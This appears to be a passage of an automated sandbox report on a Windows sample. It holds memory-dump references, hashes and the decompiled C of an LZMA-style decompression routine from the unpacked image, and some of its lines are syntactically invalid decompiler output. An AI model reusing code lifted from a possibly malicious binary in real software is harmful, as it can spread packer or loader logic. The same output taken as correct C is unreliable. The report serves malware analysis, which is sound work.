                                                                                                                                                                                                  0x00406cfe
                                                                                                                                                                                                  0x00406d00
                                                                                                                                                                                                  0x00406d00
                                                                                                                                                                                                  0x00406d00
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070df
                                                                                                                                                                                                  0x004070df
                                                                                                                                                                                                  0x004070df
                                                                                                                                                                                                  0x004070e3
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070e9
                                                                                                                                                                                                  0x004070ec
                                                                                                                                                                                                  0x004070ef
                                                                                                                                                                                                  0x004070f2
                                                                                                                                                                                                  0x004070f4
                                                                                                                                                                                                  0x004070f4
                                                                                                                                                                                                  0x004070f4
                                                                                                                                                                                                  0x004070f7
                                                                                                                                                                                                  0x004070fa
                                                                                                                                                                                                  0x004070fd
                                                                                                                                                                                                  0x00407100
                                                                                                                                                                                                  0x00407103
                                                                                                                                                                                                  0x00407106
                                                                                                                                                                                                  0x00407107
                                                                                                                                                                                                  0x00407109
                                                                                                                                                                                                  0x00407109
                                                                                                                                                                                                  0x00407109
                                                                                                                                                                                                  0x0040710c
                                                                                                                                                                                                  0x0040710f
                                                                                                                                                                                                  0x00407112
                                                                                                                                                                                                  0x00407115
                                                                                                                                                                                                  0x00407118
                                                                                                                                                                                                  0x0040711c
                                                                                                                                                                                                  0x0040711e
                                                                                                                                                                                                  0x00407121
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407123
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407123
                                                                                                                                                                                                  0x00407121
                                                                                                                                                                                                  0x00407356
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406985

                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                                                                                                                  • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00406D91 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                                                                                  			E00406D91() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00407395))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
